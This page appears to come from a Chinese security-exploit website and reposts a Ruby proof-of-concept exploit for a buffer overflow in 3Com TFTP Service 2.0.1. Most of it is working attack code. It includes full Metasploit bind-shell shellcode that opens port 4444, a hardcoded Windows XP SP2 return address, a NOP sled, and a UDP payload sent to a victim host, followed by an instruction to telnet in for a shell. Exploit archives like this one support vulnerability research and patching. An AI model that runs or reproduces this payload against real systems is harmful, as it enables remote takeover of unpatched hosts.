首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
来源:NCNIPC 作者:Liu Qixu 发布时间:2006-12-01  

# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the 3Com TFTP Service version 2.0.1
# long transporting mode buffer overflow under xp sp2 english
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb <victimhost> <victimport>
# Default port is 69 if not specified

require 'socket'

# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com

sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x39\xfb\x9f\x3e"
sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x5d\xb3\xba\xfd"
sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x89\xec\x8b\x9d"
sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x4c\xa1\x57\x46"
sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x5d\xfb\x44\xc6"
sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x83\x42\xb3\x14"
sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\xd4\xfc\xe8\x45"
sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x64\xfc\x32\xf7"
sc1 +="\x97\xc7\x1f\x0c\x72\x68\xec\xe9\xd4\xc5\xab\x47\x57\x50\x6b\x7e"
sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\xe7\xe6\x3d\x5f"
sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x7b\x69\xc2\x41"
sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x8b\x4a\xd1\x46"
sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\xa8\x51\xf9\x3b"
sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\xfc\x1c\xad\xe9"
sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x53\xfe\xee\x47"
sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\xfd\x98\x44\xc6"
sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\xf2\x25\xbf\x49"
sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16"

jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english

host = ARGV[0]
port = 69

if ARGV[1]
port = ARGV[1]
end

sock = UDPSocket.new()

puts "[+]Trying to connect to #{host}"
if (not sock.connect(host,port))
raise "Unable to connect to #{host}"
end

exploit = "\x00\x02"
exploit += "a"
exploit += "\x00"
exploit += "\x90"* 129
exploit += sc1
exploit += jmp
exploit += "\x00"

puts "[+] Connected ... Sending exploit to victim"
sock.send exploit,0

puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Exploits 3CTftpSvc Server 2.0.
·Acer LunchApp.APlunch (ActiveX
·AT-TFTP Buffer Overflow (Long
·PHPGraphy 0.9.12 Privilege Esc
·3ctftpsvc Buffer Overflow (Lon
·Serendipity <= 1.0.3 (comme
·Kubix <= 0.7 Multiple Remot
·VUPlayer <= 2.44 (M3U UNC N
·Songbird Media Player <= 0.
·VUPlayer <= 2.44 (M3U UNC N
·Quintessential Player <= 4.
·AtomixMP3 <= 2.3 Malformed
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved